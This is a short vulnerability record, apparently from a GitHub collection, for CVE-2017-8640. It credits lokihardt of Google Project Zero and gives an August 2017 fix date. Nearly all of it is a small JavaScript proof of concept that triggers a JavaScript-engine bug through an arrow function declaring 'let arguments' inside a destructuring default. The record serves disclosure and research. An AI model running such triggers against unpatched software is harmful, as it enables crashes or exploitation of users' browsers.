Skip to content

Latest commit

 

History

History
23 lines (16 loc) · 397 Bytes

CVE-2017-8640.md

File metadata and controls

23 lines (16 loc) · 397 Bytes

CVE-2017-8640

  • Fix: Aug 2017
  • Credit: lokihardt of Google Project Zero

PoC

function f() {
    ({a = () => {
        let arguments;
    }} = 1);

    arguments.x;
}

f();

Reference